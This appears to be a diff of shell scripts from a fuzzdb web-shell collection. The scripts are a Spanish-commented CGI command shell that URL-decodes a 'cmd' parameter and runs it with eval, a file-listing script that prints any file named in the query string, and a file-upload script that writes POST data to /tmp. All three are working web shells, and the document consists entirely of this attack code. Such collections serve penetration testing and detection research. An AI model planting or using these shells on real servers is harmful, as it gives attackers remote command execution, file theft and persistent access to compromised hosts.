for i in $PATHS ; do
BASENAME="$i/basename"
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
break
fi
done
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
BASENAME=basename
if (eval $TEST \"`eval $BASENAME .`\" = \".\" ); then
BASENAME=$BASENAME
else
BASENAME=""
echo ERROR: No he encontrado BASENAME en el sitio especificado ni en el path
echo
exit
fi
fi
fi
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
for i in $PATHS ; do
DIRNAME="$i/dirname"
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
break
fi
done
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
DIRNAME=dirname
if (eval $TEST \"`eval $DIRNAME .`\" = \".\" ); then
DIRNAME=$DIRNAME
else
DIRNAME=""
echo ERROR: No he encontrado DIRNAME en el sitio especificado ni en el path
echo
exit
fi
fi
fi
#echo "Info: TEST: $TEST"
#echo "Info: BASENAME: $BASENAME"
#echo "Info: DIRNAME: $DIRNAME"
if (eval $TEST -x \"/usr/bin/unalias\" ); then
# si existe el comando: unalias *
/usr/bin/unalias *
else
# si es interno: unalias -a
unalias -a
fi
#
# A partir de aqui deberia ser 100% multisistema
#
buscaexec ()
{
BUSCAEXECRES=""
if (eval $TEST -z \"$BUSCAEXECPAR\" ); then
return;
fi
if (eval $TEST -x \"$BUSCAEXECPAR\" ); then
BUSCAEXECRES=$BUSCAEXECPAR
return;
fi
BUSCAEXECPAR=`eval $BASENAME $BUSCAEXECPAR`
for i in $PATHS $PATH ; do
if (eval $TEST -x \"$i/$BUSCAEXECPAR\" ); then
BUSCAEXECRES="$i/$BUSCAEXECPAR"
break
fi
done
if (eval $TEST -n \"$BUSCAEXECRES\" ); then
return;
fi
if (eval $TEST -z \"$WHICH\" ); then
return;
fi
BUSCAEXECRES=`eval $WHICH $BUSCAEXECPAR`
if (eval $TEST -n \"$BUSCAEXECRES\" ); then
if (eval $TEST ! -x \"$BUSCAEXECRES\" ); then
BUSCAEXECRES=""
fi
fi
}
#
# Definicion de comandos concretos para el script
#
WHICH=""
BUSCAEXECPAR=/usr/bin/which
buscaexec
WHICH=$BUSCAEXECRES
if (eval $TEST -z \"$WHICH\" ) ; then
if (eval $TEST \"$TEST\" != \"test\" ) ; then
TESTCMD=$TEST
TESTRES="test"
elif (eval $TEST \"$BASENAME\" != \"basename\" ) ; then
TESTCMD=$BASENAME
TESTRES="basename"
elif (eval $TEST \"$BASEDIR\" != \"basedir\" ) ; then
TESTCMD=$BASEDIR
TESTRES="basename"
fi
if (eval $TEST -n \"$TESTCMD\"); then
OLDPATH=$PATH
TESTPATH="`eval $BASEDIR $TESTCMD`"
PATH="$TESTPATH:$PATH"
TESTPATH=""
PRUEBA="`eval $BASENAME \"\`which $TESTRES\`\" `"
if (eval $TEST \"$PRUEBA\" = \"TESTRES\" ) ; then
WHICH="`which which`"
else
WHICH=""
fi
PRUEBA=""
PATH=$OLDPATH
OLDPATH=""
TESTRES=""
TESTCMD=""
fi
fi
BUSCAEXECPAR=/bin/echo
buscaexec
ECHO=$BUSCAEXECRES
if (eval $TEST -z \"$ECHO\" ) ; then
ECHO=echo
fi
A="`eval $ECHO \"a\"`"
if (eval $TEST \"$A\" = \"a\" ) ; then
ECHO=$ECHO
else
ECHO=""
#nota mental: para que hago echo si echo no funciona!? :)
echo ERROR: No he encontrado ECHO en el sitio especificado ni en el path
echo
exit
fi
A=""
BUSCAEXECPAR=/bin/cut
buscaexec
CUT=$BUSCAEXECRES
BUSCAEXECPAR=/bin/sed
buscaexec
SED=$BUSCAEXECRES
BUSCAEXECPAR=/usr/bin/expr
buscaexec
EXPR=$BUSCAEXECRES
FORMULARIO="`eval $BASENAME $0`"
eval $ECHO \"Content-type: text/html\"
eval $ECHO
eval $ECHO \"\<html\>\<title\>CMD.SH\<\/title\>\<body\>\"
eval $ECHO \"\<p\>\<form method\=\\\"GET\\\" name\=\\\"myform\\\" action\=\\\"$FORMULARIO\\\"\>\<\/p\>\"
eval $ECHO \"\<input type\=\\\"text\\\" name\=\\\"cmd\\\"\>\"
eval $ECHO \"\<input type\=\\\"submit\\\" value\=\\\"Enviar\\\"\>\"
eval $ECHO \"\<pre\>\"
#
# La variable QUERYSTRING contiene la info que quiero
#
#echo QUERY_STRING=$QUERY_STRING
if (eval $TEST -n \"$QUERY_STRING\"); then
PARAM=`eval $ECHO \"$QUERY_STRING\" | $CUT \-d\= \-f2 | $SED \-e s\/\+\/\ \/g `
hex2dec()
{
if (eval $TEST \"$PARC\" \= \"0\" ); then
PARC="0"
elif (eval $TEST \"$PARC\" \= \"1\" ); then
PARC="1"
elif (eval $TEST \"$PARC\" \= \"2\" ); then
PARC="2"
elif (eval $TEST \"$PARC\" \= \"3\" ); then
PARC="3"
elif (eval $TEST \"$PARC\" \= \"4\" ); then
PARC="4"
elif (eval $TEST \"$PARC\" \= \"5\" ); then
PARC="5"
elif (eval $TEST \"$PARC\" \= \"6\" ); then
PARC="6"
elif (eval $TEST \"$PARC\" \= \"7\" ); then
PARC="7"
elif (eval $TEST \"$PARC\" \= \"8\" ); then
PARC="8"
elif (eval $TEST \"$PARC\" \= \"9\" ); then
PARC="9"
elif (eval $TEST \"$PARC\" \= \"a\" ); then
PARC="10"
elif (eval $TEST \"$PARC\" \= \"b\" ); then
PARC="11"
elif (eval $TEST \"$PARC\" \= \"c\" ); then
PARC="12"
elif (eval $TEST \"$PARC\" \= \"d\" ); then
PARC="13"
elif (eval $TEST \"$PARC\" \= \"e\" ); then
PARC="14"
elif (eval $TEST \"$PARC\" \= \"f\" ); then
PARC="15"
elif (eval $TEST \"$PARC\" \= \"A\" ); then
PARC="10"
elif (eval $TEST \"$PARC\" \= \"B\" ); then
PARC="11"
elif (eval $TEST \"$PARC\" \= \"C\" ); then
PARC="12"
elif (eval $TEST \"$PARC\" \= \"D\" ); then
PARC="13"
elif (eval $TEST \"$PARC\" \= \"E\" ); then
PARC="14"
elif (eval $TEST \"$PARC\" \= \"F\" ); then
PARC="15"
else
PARC="0"
fi
}
dec2ascii()
{
if (eval $TEST \"$PARC\" -eq \"0\"); then
PARC=""
elif (eval $TEST \"$PARC\" -lt \"32\"); then
PARC=""
elif (eval $TEST \"$PARC\" -eq \"34\"); then
PARC="\\\""
elif (eval $TEST \"$PARC\" -eq \"96\"); then
PARC="\`"
elif (eval $TEST \"$PARC\" -eq \"127\"); then
PARC=""
elif (eval $TEST \"$PARC\" -gt \"127\"); then
PARC=""
else
#aun no rulan todos los caracteres, los que faltan estan impresos en la linea inferior
# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX " ` ?<- el resto se ignoran, son >128
PARC="`eval $ECHO \"123456789ABCDEF0123456789ABCDEF \!X#\$%\&\'\(\)\*+,\-.\/0123456789\:\;\<=\>\?\@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\\\\\]\^_Xabcdefghijklmnopqrstuvwxyz\{\\\|\}\~X0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\" | $CUT \-b$PARC `"
# X: no printable, en la linea superior esta el caracter
# los 0123456789ABCDEF es para no descontarme poniendo X cuando habia muchas seguidas
# notese que el NULL no sale en el string
# notese que la " y la ` estan como X en el string pq estan tratadas a parte, no se pueden tratar por el eval este
# notese que los caracteres por debajo del 32 tampoco se tratan, y los mayores de 127 tampoco, aunque se pueden añadir... si tienes ganas ;) y los necesitas realmente
fi
}
TODO="$PARAM"
DONE=""
while (eval $TEST -n \"$TODO\" ); do
C=`eval $ECHO \"$TODO\" | $CUT \-b1 `
if (eval $TEST \"$C\" = \"\%\"); then
PARC="`eval $ECHO \"$TODO\" | $CUT \-b2 `"
hex2dec
C1="$PARC"
PARC="`eval $ECHO \"$TODO\" | $CUT \-b3 `"
hex2dec
C2="$PARC"
PARC="`eval $EXPR $C1 \\\* 16 \+ $C2`"
dec2ascii
C="$PARC"
TODO=`eval $ECHO \"$TODO\" | $CUT \-b4\- `
else
TODO=`eval $ECHO \"$TODO\" | $CUT \-b2\- `
fi
DONE="$DONE$C"
done
VALUE="$DONE"
eval $ECHO \"\\\$ $VALUE\"
eval $VALUE
fi
eval $ECHO \"\<\/pre\>\<\/body\>\<\/html\>\"
exit

View file

@ -0,0 +1,47 @@
#!/bin/sh
#
# SH_KIT
#
# list.sh = Directory & File Listing
#
# by: The Dark Raver
# modified: 16/12/2005
#
echo Content-Type: text/html
echo
if [ "$QUERY_STRING" != "" ]
then
echo PATH: $QUERY_STRING "<br><hr>"
echo `ls $QUERY_STRING` > /tmp/test
else
echo PATH: / "<br><hr>"
echo > /tmp/test
QUERY_STRING="/"
root="1"
fi
out=`grep "/" /tmp/test`
if [ "$out" != "" ]
then
echo FICHERO: $QUERY_STRING
echo "<hr><pre>"
cat $QUERY_STRING
else
if [ "$root" != "1" ]
then
echo "( ) <a href=?"$QUERY_STRING"/..>".."</a><br>"
fi
for i in `ls $QUERY_STRING`
do
if [ "$root" == "1" ]
then
echo "( ) <a href=?/"$i">"$i"</a><br>"
else
echo "( ) <a href=?"$QUERY_STRING"/"$i">"$i"</a><br>"
fi
done
fi

43
fuzzdb-webshell/sh/up.sh Normal file
View file

@ -0,0 +1,43 @@
#!/bin/sh
#
# BETA1 - upload to /tmp/upload
#
# SH_KIT
#
# up.sh = File Upload
#
# by: The Dark Raver
# modified: 16/12/2005
#
echo Content-Type: text/html
echo
echo "<html><body>"
echo "<form enctype=\"multipart/form-data\" action=\"\" method=\"post\">"
echo "<p>Local File: <input name=\"userfile\" type=\"file\">"
echo "<input type=\"submit\" value=\"Send\">"
echo "</form><br><br><br>"
echo "<hr>"
dd count=$CONTENT_LENGTH bs=1 of=/tmp/test
lineas=`cat /tmp/test | wc -l`
#echo LIN: $lineas
lineas2=`expr $lineas - 4`
#echo LIN2: $lineas2
lineas3=`expr $lineas2 - 1`
#echo LIN3: $lineas3
#echo "<hr>"
tail -$lineas2 /tmp/test > /tmp/test2
head -$lineas3 /tmp/test2 > /tmp/upload
#rm /tmp/test
#rm /tmp/test2
echo "<pre>"
cat /tmp/upload
echo "</pre>"